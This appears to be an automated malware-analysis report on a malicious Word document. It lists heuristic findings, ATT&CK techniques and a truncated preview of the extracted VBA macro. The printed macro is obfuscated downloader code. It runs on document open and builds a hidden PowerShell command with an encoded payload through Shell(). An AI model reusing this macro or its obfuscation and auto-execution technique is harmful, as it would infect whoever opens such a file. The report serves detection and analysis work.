MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the UrDfsT function, which utilizes the Shell function to execute a command. This command is constructed from concatenated strings, including 'powershell -WindowStyle hidden -e KAAnAH oAUAAnACsAJwB', indicating the execution of a PowerShell command with encoded arguments. The primary purpose appears to be downloading and executing a secondary payload.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17505 bytes |
SHA-256: 32e61150833b7d7628bee581672035eb6d1f6cac53a4a0e7470298f684fdacf2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "kjVjjkJTmifY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UrDfsT()
On Error Resume Next
Select Case KAliGjdXm
Case 7109
SwdKcD = 6638
kYiof = CDbl(93502)
Case 40931
lBjdL = aYmQw
jVopb = 59108
End Select
Select Case KAlNiwSX
Case 22302
kqnBL = 72600
TrWFZQ = CDbl(32865)
Case 42735
XLFri = ktMAc
ipiJS = 87705
End Select
UrDfsT = LPvsAbiz + Shell(BlKuzYbMYdp + Chr(vbKeyP) + dfsvp + pujLhY + pZatTZEfNTj + EawqIcrplc + HJFGl + Tpwoo + bdwfJwv + NTKSf + jDwwhzIik, BjMUu + vbHide + HccNRRqO)
Select Case KAljlkFM
Case 50059
iRjCO = 5565
dYGSTj = CDbl(42767)
Case 11192
pKJdpC = wHWAmT
GsRSkT = 18390
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlmZQBQ
Case 54229
wKudqu = 90998
wabin = CDbl(90011)
Case 82979
EKlAZ = Qlmkf
jNomL = 11332
End Select
UrDfsT
Select Case KAlMGIct
Case 20773
VrIoWP = 91571
LqibR = CDbl(94354)
Case 88661
qGOXT = moThmi
vhspjf = 47498
End Select
End Sub
Attribute VB_Name = "wOQbLCzHjoL"
Function dfsvp()
On Error Resume Next
Select Case KAlzoGbwZ
Case 5257
wowTnW = 32643
YWlbJJ = CDbl(54997)
Case 44055
JUvNSj = brFOJ
QJzpTN = 30475
End Select
mACEBHCN = "owersHeL" + "L -Wi" + "nDowsTyle h" + "idden -e KAAnAH" + "oAUAAnACsAJwB"
Select Case KAlZWzOt
Case 25072
japMj = 83534
FGkdIY = CDbl(85254)
Case 92161
CbkFc = UpOHZk
wzYTSv = 32496
End Select
IqzuX = "yACcAKwAnA" + "G4AJwArACcA" + "cwBhAGQAJw" + "ArACcAYQBzACc" + "AKwAnA"
Select Case KAlCawdD
Case 81698
qFrRd = 12811
nIHfCG = CDbl(99888)
Case 95244
RCIKlF = GzfzAB
cZnPzJ = 29939
End Select
cNREpPGYqjm = "GQAIAA9ACcAKwA" + "nACAA" + "JgAoAG4AYgA4AG4" + "AbgBiADgAKwBu" + "AGIAJwArACc" + "AOABlA"
Select Case KAlHqzMQ
Case 23314
sKQEzi = 51017
fTkQlU = CDbl(96293)
Case 13339
mTfGPq = oMJvR
YocTE = 38982
End Select
lzUfwurkfBF = "G4AYgA4" + "ACsAbgAnA" + "CsAJw" + "BiADgAdwAnACsAJ" + "wAtAG8AYgBq" + "AGUAYw"
Select Case KAlvDKBdH
Case 90911
sinJj = 5077
whjdT = CDbl(31072)
Case 31245
VfdUuw = RPdXBi
dcHvl = 92597
End Select
hwXTvOAPVw = "BuAGIAOAArA" + "G4AYgA" + "4AHQAJwArA" + "CcAbgAnACsAJw" + "BiADgAJwArAC" + "cAKQAgAHIAJw"
dfsvp = mACEBHCN + IqzuX + cNREpPGYqjm + lzUfwurkfBF + hwXTvOAPVw
End Function
Function pujLhY()
On Error Resume Next
Select Case KAlVmhIzr
Case 91554
bATfSo = 43642
mASEMY = CDbl(60588)
Case 23045
rnDEV = iUCAs
MvEsfo = 56500
End Select
warWY = "ArACcAYQBuAG" + "QAJwAr" + "ACcAbwBtAD" + "sAegBQA"
Select Case KAlVQVGc
Case 41387
TrVzGV = 13362
EriFc = CDbl(77961)
Case 21759
odDaE = LhjCH
aRzbzc = 22031
End Select
QwWQUqsIT = "HIAWQAnACsAJwBZ" + "AFUAIAAnACsA" + "JwA9ACAAL" + "gAoAG" + "4AYgA4AG4"
Select Case KAlhDmaFn
Case 98708
wiBQK = 1696
cZvqEj = CDbl(77242)
Case 26524
Oahmu = Fzdji
rdUQPK = 70391
End Select
ViYTJzHYzcz = "AZQAnA" + "CsAJwBuA" + "GIAOAArA" + "G4AJwArACcAY" + "gAnACsAJ" + "wA4ACcAKwAnA" + "HcAJwArACc"
Select Case KAlArVZk
Case 39221
ElGvs = 79749
LiGMGq = CDbl(55831)
Case 3458
bSwlva = pVDNDX
HCaDB = 25786
End Select
jXjwXGIhE = "AbgAnACsAJwBi" + "ADgAKw" + "BuAGIAOAAt" + "AG8AYgBqAGUAYw" + "B0ACcAKwA" + "nAG4AJ"
pujLhY = warWY + QwWQUqsIT + ViYTJzHYzcz + jXjwXGIh
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.